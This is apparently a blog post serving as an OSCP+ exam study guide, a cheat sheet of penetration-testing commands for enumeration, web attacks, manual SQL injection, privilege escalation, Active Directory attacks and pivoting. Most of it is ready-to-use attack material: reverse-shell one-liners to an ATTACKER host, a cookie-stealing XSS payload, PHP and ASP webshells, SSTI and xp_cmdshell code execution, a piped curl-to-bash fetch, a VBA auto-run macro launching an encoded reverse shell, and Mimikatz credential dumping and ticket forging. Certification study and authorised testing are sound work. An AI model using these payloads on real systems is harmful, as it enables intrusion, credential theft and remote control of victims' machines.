certification

OSCP+ COMPLETE GUIDE - ZERO TO HERO

Everything you need to pass the OSCP+ exam in one place. This guide covers all PEN-200 topics with working commands and real methodology - written like short handwritten notes with zero fluff.

lazyhackers

Apr 12, 2026 · 23 min read · 117 views

#ethical-hacking #kali-linux #offsec #oscp-cheat-sheet #oscp-guide #oscp-notes #oscp-plus #oscp+ #pen-200 #Penetration Testing

OSCP+ Complete Guide 2026

Beginner to Exam Ready - Everything You Need to Pass

What's Inside This Guide:

■	Full enumeration commands (Nmap, SMB, Web, SNMP, DNS, FTP, LDAP)
■	Web attacks (LFI, RFI, Command Injection, File Upload, SSTI, XXE)
■	SQL Injection - fully manual (sqlmap is banned on the exam)
■	Linux & Windows Privilege Escalation (sudo, SUID, cron, tokens, services)
■	Active Directory attacks (AS-REP Roast, Kerberoast, BloodHound, DCSync)
■	Pivoting & Tunneling (Chisel, Ligolo-ng, SSH tunneling, Proxychains)
■	Shells, Payloads & File Transfer methods
■	Password Attacks (Hydra, Hashcat, John, Pass the Hash)
■	Client-Side Attacks (Macros, HTA, LNK)
■	Exam format, point distribution & hour-by-hour strategy
■	Practice machine list (HackTheBox, Proving Grounds, TryHackMe, VulnHub)
■	All exam restrictions clearly listed (Metasploit, AI tools, sqlmap)

1. WHAT IS OSCP+? UNDERSTANDING THE NEW FORMAT

OSCP+ (Offensive Security Certified Professional Plus) is a hands-on penetration testing certification offered by OffSec. In 2024, OffSec updated the OSCP exam and now refers to it as "OSCP+".

Old OSCP vs New OSCP+

Feature	Old OSCP	New OSCP+
Machines	5 standalone	3 standalone + 1 AD set
Points	3x20 + 2x25 = 100	3x20 + 40(AD) = 100
Pass Score	70 points	70 points
AD Set	Not included	All or nothing (40pts)
Exam Time	24 hrs hack + 24 hrs report	23 hrs 45 min hack + 24 hrs report
Bonus Points	Lab report bonus	10 bonus points (80% exercises + 30 lab machines)

Point Breakdown (New Format)

Component	Points	Details
Standalone Machine 1	20 pts	10 local.txt + 10 proof.txt
Standalone Machine 2	20 pts	10 local.txt + 10 proof.txt
Standalone Machine 3	20 pts	10 local.txt + 10 proof.txt
AD Set (3 machines)	40 pts	ALL or NOTHING - must compromise entire chain
Bonus Points	10 pts	80% course exercises + 30 lab machines

IMPORTANT: Best Strategy for 70 Points

AD set (40) + 2 standalone full (40) + bonus (10) = 90 points. Get your bonus points BEFORE the exam. Complete 80% of course exercises and 30 lab machines. This gives you a 10-point cushion.

2. EXAM RULES & RESTRICTIONS

BANNED / RESTRICTED TOOLS - READ CAREFULLY

Tool / Action	Status
Metasploit Framework	ALLOWED ON ONLY 1 MACHINE (use wisely - save for hardest standalone)
msfvenom	ALLOWED on all machines (only for payload generation)
AI Tools (ChatGPT, Claude, Copilot, etc.)	COMPLETELY BANNED - Zero tolerance. Instant fail if detected.
sqlmap	BANNED for exploitation. Manual SQL injection only.
Auto-exploitation tools	BANNED (no auto-pwn, no automated exploit frameworks)
Commercial tools	BANNED (no Burp Pro, no Cobalt Strike, no Core Impact)
Spoofing / ARP attacks	BANNED (don't mess with the network)

ALLOWED Tools

✔	Nmap (all scripts and scans)
✔	Gobuster, Feroxbuster, Dirb, Dirsearch, ffuf
✔	Burp Suite Community Edition (free version)
✔	Hydra, John the Ripper, Hashcat
✔	Impacket suite, BloodHound, Rubeus, Mimikatz
✔	Chisel, Ligolo-ng, SSH tunneling tools
✔	LinPEAS, WinPEAS, linEnum, PowerUp
✔	Netcat, Socat, msfvenom (payload gen only)
✔	Custom scripts (Python, Bash, PowerShell - you write them)

Exam Logistics

Proctoring:	Webcam + Screen sharing the entire time
VPN:	OffSec provides VPN connection to exam lab
OS:	Kali Linux (official VM recommended)
Breaks:	You can take breaks anytime (timer keeps running)
Screenshots:	MUST screenshot every flag with ipconfig/ifconfig visible
Proof:	cat local.txt and proof.txt + ip addr / ipconfig in same screenshot

3. METHODOLOGY - HOW TO THINK LIKE A PENTESTER

The golden rule of OSCP: ENUMERATE MORE. ENUMERATE HARDER. ENUMERATE AGAIN.

Step-by-Step Attack Methodology

Phase	What To Do	Tools
1. Scan	Find all open ports and services	Nmap, Masscan
2. Enumerate	Deep-dive each service, find versions, users, shares	Nmap scripts, smbclient, enum4linux, gobuster
3. Vulnerability ID	Find exploits for discovered versions/services	searchsploit, Google, ExploitDB
4. Exploitation	Get initial foothold (reverse shell / user access)	Manual exploits, web attacks, password attacks
5. Post-Exploitation	Enumerate from inside, find privesc path	LinPEAS, WinPEAS, manual checks
6. Privilege Escalation	Get root/SYSTEM/Administrator	sudo, SUID, services, tokens, kernel exploits
7. Loot	Grab flags, take screenshots, look for creds for pivoting	cat proof.txt, hashdump, mimikatz

PRO TIP: When you are stuck

1. Re-run Nmap with -sV -sC -A
2. Check ALL ports (not just top 1000)
3. Re-enumerate every service you found
4. Look at every web page source code
5. Try default credentials everywhere
6. Check for hidden directories/files with bigger wordlists
7. Read every file on the system you have access to

4. NMAP SCANNING - YOUR FIRST TOOL ON EVERY TARGET

Essential Nmap Scans

Purpose	Command
Quick initial scan	`nmap -sC -sV -oN initial.txt TARGET`
Full port scan	`nmap -p- -sV -sC -oN allports.txt TARGET`
Fast full port scan	`nmap -p- --min-rate=1000 -T4 TARGET`
UDP scan (top 20)	`sudo nmap -sU --top-ports=20 -oN udp.txt TARGET`
Aggressive scan	`nmap -A -T4 -p- TARGET`
Vulnerability scan	`nmap --script vuln -p PORTS TARGET`
Scan specific ports deep	`nmap -sV -sC -p 80,443,8080 -oN web.txt TARGET`
OS detection	`sudo nmap -O TARGET`

Useful Nmap Script Categories

SMB:	`nmap --script smb-enum-shares,smb-enum-users,smb-vuln* -p 445 TARGET`
HTTP:	`nmap --script http-enum,http-headers,http-methods -p 80 TARGET`
FTP:	`nmap --script ftp-anon,ftp-bounce,ftp-vuln* -p 21 TARGET`
DNS:	`nmap --script dns-zone-transfer -p 53 TARGET`
SNMP:	`nmap -sU --script snmp-brute,snmp-info -p 161 TARGET`

EXAM TIP

Always run TWO scans: 1) Quick scan of common ports for fast results. 2) Full port scan (-p-) in background while you work on initial findings. You don't want to miss a service running on port 50000.

5. SERVICE ENUMERATION

Web Enumeration (HTTP/HTTPS - Port 80, 443, 8080, etc.)

Task	Command
Directory brute force	`gobuster dir -u http://TARGET -w /usr/share/wordlists/dirb/common.txt -o dirs.txt`
With extensions	`gobuster dir -u http://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,txt,html,bak,old`
Subdomain brute force	`gobuster vhost -u http://TARGET -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt`
Nikto scan	`nikto -h http://TARGET`
ffuf fuzzing	`ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,301,302`
WhatWeb fingerprint	`whatweb http://TARGET`
Wappalyzer (manual)	Check browser extension for technologies used

SMB Enumeration (Port 139, 445)

List shares	`smbclient -L //TARGET -N`
Connect to share	`smbclient //TARGET/sharename -N`
Enum4linux	`enum4linux -a TARGET`
CrackMapExec	`crackmapexec smb TARGET --shares`
Recursive download	`smbget -R smb://TARGET/share`

SNMP Enumeration (Port 161 UDP)

Community string brute	`onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt TARGET`
Walk SNMP tree	`snmpwalk -v2c -c public TARGET`
Get users	`snmpwalk -v2c -c public TARGET 1.3.6.1.4.1.77.1.2.25`
Get running processes	`snmpwalk -v2c -c public TARGET 1.3.6.1.2.1.25.4.2.1.2`

Other Services

Service	Commands
FTP (21)	`ftp TARGET` (try anonymous:anonymous)
SSH (22)	Banner grab: `nc -nv TARGET 22`
SMTP (25)	`smtp-user-enum -M VRFY -U users.txt -t TARGET`
DNS (53)	`dig axfr @TARGET domain.com` (zone transfer)
RPC (111)	`rpcclient -U "" TARGET` then: enumdomusers, enumdomgroups
NFS (2049)	`showmount -e TARGET` then `mount -t nfs TARGET:/share /mnt`
LDAP (389)	`ldapsearch -x -H ldap://TARGET -b "dc=domain,dc=com"`
MySQL (3306)	`mysql -h TARGET -u root -p`
MSSQL (1433)	`impacket-mssqlclient user:pass@TARGET -windows-auth`
RDP (3389)	`xfreerdp /v:TARGET /u:user /p:pass /dynamic-resolution`
WinRM (5985)	`evil-winrm -i TARGET -u user -p pass`

6. WEB APPLICATION ATTACKS

Local File Inclusion (LFI)

Technique	Payload
Basic LFI	`?page=../../../../etc/passwd`
Null byte (old PHP)	`?page=../../../../etc/passwd`
Double encoding	`?page=../etc/passwd`
PHP Wrapper (base64)	`?page=php://filter/convert.base64-encode/resource=index.php`
PHP data wrapper	`?page=data://text/plain,<?php system($_GET['cmd']); ?>`
Log poisoning (Apache)	Inject PHP in User-Agent, then include `?page=../../../../var/log/apache2/access.log`

Key files to read via LFI:

Linux:	/etc/passwd, /etc/shadow, /etc/hosts, /home/user/.ssh/id_rsa, /etc/crontab, /proc/self/environ
Windows:	C:\Windows\System32\drivers\etc\hosts, C:\Windows\win.ini, C:\inetpub\wwwroot\web.config

Remote File Inclusion (RFI)

Requires allow_url_include=On in PHP config.

Basic RFI	`?page=http://ATTACKER_IP/shell.php`
SMB share (Windows)	`?page=\\ATTACKER_IP\share\shell.php`

Command Injection

Operator	Payload Example	Behavior
`;`	`127.0.0.1; whoami`	Run both commands
`\|`	`127.0.0.1 \| whoami`	Pipe output
`\|\|`	`invalidcmd \|\| whoami`	Run second if first fails
`&&`	`127.0.0.1 && whoami`	Run second if first succeeds
`cmd`	127.0.0.1 `whoami`	Command substitution
`$(cmd)`	`127.0.0.1 $(whoami)`	Command substitution

File Upload Attacks

PHP webshell	`<?php system($_GET['cmd']); ?>` save as shell.php
Double extension	`shell.php.jpg` or `shell.php.jpg`
Content-Type bypass	Change Content-Type to image/jpeg in Burp while uploading .php
Magic bytes	Add GIF89a; at the beginning of your PHP file
ASP webshell	`<%eval request("cmd")%>`

Server-Side Template Injection (SSTI)

Test for SSTI	`{{7*7}}` - if you see 49, it's vulnerable
Jinja2 RCE	`{{config.__class__.__init__.__globals__['os'].popen('id').read()}}`
Twig RCE	`{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}`

XXE (XML External Entity)

Read file	`<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>`
SSRF via XXE	`<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal:8080">]>`

XSS (Cross-Site Scripting)

Basic test	`<script>alert(1)</script>`
Cookie steal	`<script>new Image().src="http://ATTACKER/steal?c="+document.cookie</script>`
Event handler	`<img src=x onerror=alert(1)>`

7. SQL INJECTION (100% MANUAL - sqlmap is BANNED)

REMEMBER: sqlmap is BANNED on the OSCP exam. You MUST do SQL injection manually. Practice this extensively.

Testing for SQLi

Single quote test	`' OR 1=1-- -`
Double quote test	`" OR 1=1-- -`
Error based	`' AND 1=CONVERT(int,(SELECT @@version))-- -`

UNION-Based SQLi (Step by Step)

Step	Payload
1. Find column count	`' ORDER BY 1-- -` (increment until error)
2. Find injectable column	`' UNION SELECT 1,2,3,4-- -`
3. Get database name	`' UNION SELECT 1,database(),3,4-- -`
4. Get tables	`' UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- -`
5. Get columns	`' UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name='users'-- -`
6. Dump data	`' UNION SELECT 1,group_concat(username,0x3a,password),3,4 FROM users-- -`

Blind Boolean-Based SQLi

Test true/false	`' AND 1=1-- -` (true) vs `' AND 1=2-- -` (false)
Extract char by char	`' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'-- -`

Time-Based Blind SQLi

MySQL	`' AND IF(1=1,SLEEP(5),0)-- -`
MSSQL	`' WAITFOR DELAY '0:0:5'-- -`
PostgreSQL	`' AND (SELECT pg_sleep(5))-- -`

MSSQL Specific - Command Execution via xp_cmdshell

Enable xp_cmdshell	`EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;`
Execute command	`EXEC xp_cmdshell 'whoami'`
Reverse shell	`EXEC xp_cmdshell 'powershell -e BASE64_ENCODED_PAYLOAD'`

8. PASSWORD ATTACKS

Online Brute Force with Hydra

Service	Command
SSH	`hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://TARGET`
FTP	`hydra -l user -P /usr/share/wordlists/rockyou.txt ftp://TARGET`
HTTP POST Login	`hydra -l admin -P rockyou.txt TARGET http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid"`
RDP	`hydra -l admin -P rockyou.txt rdp://TARGET`
SMB	`hydra -l admin -P rockyou.txt smb://TARGET`

Offline Hash Cracking

Tool	Command
Hashcat (MD5)	`hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt`
Hashcat (NTLM)	`hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt`
Hashcat (NTLMv2)	`hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt`
Hashcat (Kerberoast)	`hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt`
Hashcat (AS-REP)	`hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt`
John the Ripper	`john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt`
John (show cracked)	`john --show hash.txt`

Hash Identification

hashid	`hashid HASH_VALUE`
hash-identifier	`hash-identifier` (interactive)
Online	https://hashes.com/en/tools/hash_identifier

Pass the Hash (PTH)

PsExec	`impacket-psexec -hashes :NTLM_HASH administrator@TARGET`
WMIExec	`impacket-wmiexec -hashes :NTLM_HASH administrator@TARGET`
Evil-WinRM	`evil-winrm -i TARGET -u administrator -H NTLM_HASH`
CrackMapExec	`crackmapexec smb TARGET -u administrator -H NTLM_HASH --exec-method smbexec -x 'whoami'`

9. LINUX PRIVILEGE ESCALATION

Automated Enumeration

LinPEAS	`curl http://ATTACKER_IP/linpeas.sh \| bash`
LinEnum	`./LinEnum.sh -r report -e /tmp/ -t`
linux-exploit-suggester	`./linux-exploit-suggester.sh`

Manual Checks (Do These First!)

Check	Command
Current user	`id; whoami`
Sudo rights	`sudo -l`
SUID binaries	`find / -perm -4000 -type f 2>/dev/null`
SGID binaries	`find / -perm -2000 -type f 2>/dev/null`
Writable files	`find / -writable -type f 2>/dev/null`
Cron jobs	`crontab -l; ls -la /etc/cron*; cat /etc/crontab`
Running processes	`ps aux`
Network connections	`ss -tulnp; netstat -tulnp`
Capabilities	`getcap -r / 2>/dev/null`
Kernel version	`uname -a; cat /etc/os-release`
Internal services	`ss -tlnp` (look for 127.0.0.1 services)
Passwords in files	`grep -rli 'password' /var/www/ /opt/ /home/ 2>/dev/null`
SSH keys	`find / -name id_rsa 2>/dev/null; find / -name authorized_keys 2>/dev/null`
NFS exports	`cat /etc/exports` (look for no_root_squash)

Common Privesc Techniques

Technique	Details
Sudo abuse	Check GTFOBins for any binary listed in `sudo -l`
SUID abuse	Check GTFOBins for SUID binaries. Custom SUID binaries are goldmines.
Cron job abuse	If cron runs a script you can write to, add a reverse shell to it
PATH manipulation	If a SUID binary calls another binary without full path, create a malicious version in your PATH
Wildcard injection	If tar/rsync uses * in cron, inject flags via filenames (e.g., --checkpoint-action)
NFS no_root_squash	Mount share, create SUID binary as root on your machine, execute on target
Kernel exploit	Last resort! Check `uname -a` then searchsploit. DirtyPipe, DirtyCow, PwnKit.

GTFOBins - Your Best Friend

Website: https://gtfobins.github.io/ - Search for any binary and it tells you how to exploit it for sudo, SUID, capabilities, and more.

10. WINDOWS PRIVILEGE ESCALATION

Automated Enumeration

WinPEAS	`.\winPEASany.exe`
PowerUp	`powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"`
Seatbelt	`.\Seatbelt.exe -group=all`

Manual Checks

Check	Command
Current user info	`whoami /all`
User privileges	`whoami /priv`
System info	`systeminfo`
Running services	`wmic service list config`
Installed programs	`wmic product get name,version`
Scheduled tasks	`schtasks /query /fo LIST /v`
Network connections	`netstat -ano`
Unquoted service paths	`wmic service get name,displayname,pathname,startmode \| findstr /i /v "C:\Windows"`
Writable service binaries	`icacls "C:\path\to\service.exe"`
AlwaysInstallElevated	`reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
Stored credentials	`cmdkey /list` then `runas /savecred /user:admin cmd.exe`
SAM & SYSTEM backup	Check `C:\Windows\Repair\SAM` and `C:\Windows\System32\config\RegBack\`

Token Impersonation (SeImpersonatePrivilege)

If whoami /priv shows SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege:

PrintSpoofer	`.\PrintSpoofer64.exe -i -c cmd`
GodPotato	`.\GodPotato.exe -cmd "cmd /c whoami"`
JuicyPotato	`.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c C:\temp\nc.exe ATTACKER 4444 -e cmd.exe" -t *`
SweetPotato	`.\SweetPotato.exe -e EfsRpc -p C:\temp\nc.exe -a "ATTACKER 4444 -e cmd.exe"`

Service Exploitation

Check service permissions	`accesschk.exe /accepteula -uwcqv "Users" *`
Change service binary	`sc config vulnerable_service binpath= "C:\temp\reverse.exe"`
Restart service	`sc stop vulnerable_service && sc start vulnerable_service`

11. FILE TRANSFERS

Setting Up Servers (Attacker Machine)

Python HTTP	`python3 -m http.server 80`
PHP HTTP	`php -S 0.0.0.0:80`
SMB Server	`impacket-smbserver share . -smb2support`
SMB with creds	`impacket-smbserver share . -smb2support -username user -password pass`

Download to Linux Target

wget	`wget http://ATTACKER_IP/file -O /tmp/file`
curl	`curl http://ATTACKER_IP/file -o /tmp/file`
Netcat	Attacker: `nc -lvnp 9999 < file` Target: `nc ATTACKER 9999 > file`
SCP	`scp user@ATTACKER:/path/file /tmp/file`

Download to Windows Target

certutil	`certutil -urlcache -f http://ATTACKER_IP/file C:\temp\file`
PowerShell	`powershell -c "(New-Object Net.WebClient).DownloadFile('http://ATTACKER/file','C:\temp\file')"`
PowerShell IWR	`Invoke-WebRequest -Uri http://ATTACKER/file -OutFile C:\temp\file`
SMB copy	`copy \\ATTACKER_IP\share\file C:\temp\file`
Bitsadmin	`bitsadmin /transfer job /download /priority high http://ATTACKER/file C:\temp\file`

12. SHELLS & PAYLOADS

Reverse Shells (One-Liners)

Language	Command
Bash	`bash -i >& /dev/tcp/ATTACKER/4444 0>&1`
Python	`python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'`
PHP	`php -r '$sock=fsockopen("ATTACKER",4444);exec("bash <&3 >&3 2>&3");'`
Netcat (traditional)	`nc -e /bin/bash ATTACKER 4444`
Netcat (no -e)	`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|bash -i 2>&1\|nc ATTACKER 4444 >/tmp/f`
PowerShell	`powershell -e BASE64_ENCODED_REVSHELL` (use revshells.com)

Listener Setup

Netcat listener	`nc -lvnp 4444`
rlwrap listener	`rlwrap nc -lvnp 4444` (better for Windows shells)

Shell Stabilization (Linux)

Step	Command
1. Spawn PTY	`python3 -c 'import pty;pty.spawn("/bin/bash")'`
2. Background shell	Press `Ctrl+Z`
3. Fix terminal	`stty raw -echo; fg`
4. Set terminal	`export TERM=xterm`

msfvenom Payloads (Allowed on all machines - payload gen only)

Platform	Command
Linux ELF	`msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf`
Windows EXE	`msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe`
Windows DLL	`msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f dll -o shell.dll`
PHP	`msfvenom -p php/reverse_php LHOST=IP LPORT=4444 -f raw > shell.php`
ASP	`msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -f asp -o shell.asp`
JSP	`msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.jsp`
WAR	`msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=4444 -f war -o shell.war`
HTA	`msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -f hta-psh -o shell.hta`

13. ACTIVE DIRECTORY - ENUMERATION

AD Set = 40 Points (All or Nothing)

The AD set has 3 machines. You must compromise ALL of them to get 40 points. Partial completion = 0 points. This is the single biggest chunk of points on the exam.

Initial AD Enumeration (From Kali)

Find Domain Controller	`nmap -p 389,88,53 SUBNET/24`
Enumerate users (no creds)	`kerbrute userenum -d domain.com --dc DC_IP users.txt`
LDAP anonymous bind	`ldapsearch -x -H ldap://DC_IP -b "dc=domain,dc=com"`
RPC null session	`rpcclient -U "" -N DC_IP` then: enumdomusers, enumdomgroups
SMB null session	`crackmapexec smb DC_IP -u '' -p '' --shares`

Enumeration with Credentials

BloodHound collection	`bloodhound-python -d domain.com -u user -p pass -c All -ns DC_IP`
SharpHound (from Windows)	`.\SharpHound.exe -c All`
Enumerate all users	`crackmapexec smb DC_IP -u user -p pass --users`
Enumerate groups	`crackmapexec smb DC_IP -u user -p pass --groups`
Enumerate shares	`crackmapexec smb DC_IP -u user -p pass --shares`
PowerView (from Windows)	`powershell -ep bypass -c ". .\PowerView.ps1; Get-DomainUser; Get-DomainGroup; Get-DomainComputer"`

14. ACTIVE DIRECTORY - ATTACKS

AS-REP Roasting (No creds needed - just valid usernames)

Get AS-REP hash	`impacket-GetNPUsers domain.com/ -usersfile users.txt -dc-ip DC_IP -format hashcat -outputfile asrep.txt`
Crack the hash	`hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt`

Kerberoasting (Need valid domain creds)

Get TGS hash	`impacket-GetUserSPNs domain.com/user:pass -dc-ip DC_IP -request -outputfile kerberoast.txt`
Rubeus (from Windows)	`.\Rubeus.exe kerberoast /outfile:kerberoast.txt`
Crack the hash	`hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt`

Password Spraying

CrackMapExec	`crackmapexec smb DC_IP -u users.txt -p 'Password123!' --continue-on-success`
Kerbrute	`kerbrute passwordspray -d domain.com --dc DC_IP users.txt 'Password123!'`

DCSync Attack (Need high privilege - Domain Admin or replication rights)

Dump all hashes	`impacket-secretsdump domain.com/admin:pass@DC_IP`
Mimikatz DCSync	`mimikatz# lsadump::dcsync /user:administrator /domain:domain.com`

Other AD Attacks

Golden Ticket	`mimikatz# kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-... /krbtgt:HASH /ptt`
Silver Ticket	Forge ticket for specific service using service account hash
Unconstrained Delegation	Find with PowerView: `Get-DomainComputer -Unconstrained`
Constrained Delegation	Find with PowerView: `Get-DomainComputer -TrustedToAuth`

15. ACTIVE DIRECTORY - LATERAL MOVEMENT

Tool	Command	Notes
PsExec	`impacket-psexec domain/user:pass@TARGET`	SYSTEM shell, creates service
WMIExec	`impacket-wmiexec domain/user:pass@TARGET`	Stealthier, user-level shell
SMBExec	`impacket-smbexec domain/user:pass@TARGET`	SYSTEM shell via SMB
Evil-WinRM	`evil-winrm -i TARGET -u user -p pass`	Needs port 5985 open
RDP	`xfreerdp /v:TARGET /u:domain\\user /p:pass`	GUI access, port 3389
PTH - PsExec	`impacket-psexec -hashes :HASH domain/admin@TARGET`	Pass the hash
CrackMapExec spray	`crackmapexec smb SUBNET/24 -u user -p pass`	Check cred reuse

Mimikatz (Post-Exploitation on Windows)

Dump creds	`mimikatz# sekurlsa::logonpasswords`
Dump SAM	`mimikatz# lsadump::sam`
Pass the hash	`mimikatz# sekurlsa::pth /user:admin /domain:domain.com /ntlm:HASH /run:cmd.exe`

16. PIVOTING & TUNNELING

WHY PIVOTING MATTERS

In the AD set, machines are often on internal networks you can't reach directly. You MUST pivot through compromised machines. Practice this extensively!

Chisel (HTTP Tunneling - Most Reliable)

Server (Attacker)	`chisel server --reverse -p 8080`
Client - SOCKS proxy	`chisel client ATTACKER:8080 R:socks`
Client - Port forward	`chisel client ATTACKER:8080 R:8888:INTERNAL_TARGET:80`
Use with proxychains	`proxychains nmap -sT INTERNAL_TARGET`

Ligolo-ng (Modern - Very Easy to Use)

Create TUN (Attacker)	`sudo ip tuntap add user kali mode tun ligolo; sudo ip link set ligolo up`
Proxy (Attacker)	`./proxy -selfcert -laddr 0.0.0.0:443`
Agent (Target)	`./agent -connect ATTACKER:443 -ignore-cert`
Add route (Attacker)	`sudo ip route add INTERNAL_SUBNET/24 dev ligolo`
Start tunnel	In ligolo proxy: `session` then `start`

SSH Tunneling

Local port forward	`ssh -L LOCAL_PORT:INTERNAL_TARGET:TARGET_PORT user@PIVOT_HOST`
Dynamic SOCKS proxy	`ssh -D 1080 user@PIVOT_HOST`
Remote port forward	`ssh -R ATTACKER_PORT:INTERNAL_TARGET:TARGET_PORT user@ATTACKER`

Proxychains Configuration

Edit /etc/proxychains4.conf - add at the bottom:

socks5 127.0.0.1 1080

Then use: proxychains nmap -sT -Pn INTERNAL_TARGET

Windows Port Forwarding (Netsh)

Forward port	`netsh interface portproxy add v4tov4 listenport=8888 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_TARGET`
Show forwards	`netsh interface portproxy show all`

17. CLIENT-SIDE ATTACKS

Microsoft Office Macro (VBA)

Create a Word document with this macro:

Sub AutoOpen()

  Dim cmd As String

  cmd = "powershell -e BASE64_ENCODED_REVERSE_SHELL"

  Shell cmd, vbHide

End Sub

HTA (HTML Application)

Generate with msfvenom or create manually. Serve via Python HTTP server and send the link to the target.

LNK (Shortcut) File Attack

Create malicious .lnk that executes PowerShell when clicked. Place on writable SMB share.

18. PORT FORWARDING SCENARIOS

Scenario	Solution
Internal web service on target (127.0.0.1:8080)	`ssh -L 8080:127.0.0.1:8080 user@TARGET`
Internal machine (10.10.10.5:445) via pivot	`ssh -L 445:10.10.10.5:445 user@PIVOT`
Full internal network access	Use Ligolo-ng or Chisel SOCKS + proxychains
Reverse shell from internal to Kali	Use Socat relay: `socat tcp-l:4444,fork tcp:ATTACKER:4444`

19. BUFFER OVERFLOW (BOF) NOTES

Note: BOF is rarely on the new OSCP+ exam format, but know the basics just in case. The main BOF technique you should know:

Basic BOF Methodology

Step	Action
1. Fuzzing	Send increasing amounts of data to find the crash point
2. Find EIP offset	`msf-pattern_create -l LENGTH` then `msf-pattern_offset -q EIP_VALUE`
3. Find bad characters	Send all bytes 0x00-0xFF, compare in debugger
4. Find JMP ESP	`!mona jmp -r esp -cpb "\x00"`
5. Generate shellcode	`msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -b "\x00" -f python`
6. Exploit	Combine: padding + EIP + NOP sled + shellcode

20. REPORT WRITING

Your report can make or break your pass. Even if you get enough points, a bad report = FAIL.

Report Requirements

Format	PDF only (use OffSec template recommended)
Due	24 hours after exam ends
Must include	Step-by-step reproduction, screenshots of every step, proof screenshots
Proof format	cat local.txt + cat proof.txt + ip addr (ipconfig) in SAME screenshot
Language	English only

For Each Machine, Document:

1.	Service enumeration (what you found)
2.	Vulnerability identified (with CVE if applicable)
3.	Exploitation steps (exact commands with output)
4.	Privilege escalation steps
5.	Proof screenshots (local.txt + proof.txt + IP)
6.	Post-exploitation findings

PRO TIP: Screenshot EVERYTHING

Take a screenshot after EVERY command that gives interesting output. You can always discard extras later, but you can't go back to the exam to take a missed screenshot. Use Flameshot or just PrintScreen constantly.

21. EXAM STRATEGY (HOUR BY HOUR)

Recommended Approach (23 hrs 45 min)

Time	Action	Target Points
0:00 - 0:15	Setup: connect VPN, verify access, run initial Nmap on ALL machines	-
0:15 - 6:00	AD SET - This is your priority. 40 points all or nothing.	40 pts
6:00 - 6:30	BREAK - Eat food, stretch, rest your eyes	-
6:30 - 10:00	Standalone Machine 1 (easiest looking one first)	20 pts
10:00 - 13:00	Standalone Machine 2	20 pts
13:00 - 13:30	BREAK - Eat, nap if needed	-
13:30 - 17:00	Standalone Machine 3 (or go back to unfinished machines)	20 pts
17:00 - 23:45	Clean up, re-attempt stuck machines, start writing notes for report	-

CRITICAL EXAM RULES

1.	AD first - 40 points is the biggest single chunk
2.	Don't spend more than 2 hours on one standalone without switching
3.	Get local.txt (10 pts) even if you can't privesc - partial points help!
4.	Screenshot EVERYTHING as you go - don't wait until the end
5.	Save your Metasploit use for the hardest standalone
6.	With bonus points (10), you need: AD(40) + 1 full standalone(20) = 70
7.	Take breaks! Fatigue causes tunnel vision

22. PRACTICE MACHINES

HackTheBox (HTB) - OSCP-Like Machines

Machine	Focus Area	Difficulty
Lame	SMB exploitation	Easy
Legacy	Windows SMB	Easy
Blue	EternalBlue	Easy
Nibbles	Web + Linux privesc	Easy
Bastard	Drupal + Windows	Medium
Active	Active Directory	Medium
Forest	AD + AS-REP Roast	Medium
Cascade	AD + LDAP	Medium
Resolute	AD + Password Spray	Medium
Monteverde	AD + Azure	Medium
Jeeves	Jenkins + Windows	Medium
Conceal	SNMP + IPSec	Hard

Proving Grounds (OffSec) - Most Exam-Like

Proving Grounds Practice is the CLOSEST to the actual exam. Do as many as possible.

Recommended:

Algernon, AuthBy, ClamAV, DVR4, Exfiltrated, Hawat, Heist, Hunit, Internal, Kevin, Medjed, Nickel, Pelican, Readys, Resourced, Snookums, Sorcerer, Squid, Sybaris, Twiggy, Vault, Wombo, Zino

TryHackMe Paths

■	Jr Penetration Tester Learning Path
■	Offensive Pentesting Learning Path
■	Buffer Overflow Prep room
■	Wreath (pivoting practice)
■	AD module rooms

VulnHub (Free)

■	Kioptrix series (1-5)
■	FristiLeaks
■	Stapler
■	HackLAB: Vulnix
■	SickOs series

23. TOOL INSTALLATION

Essential Tools Setup

Tool	Install Command
Chisel	`apt install chisel` or download from GitHub releases
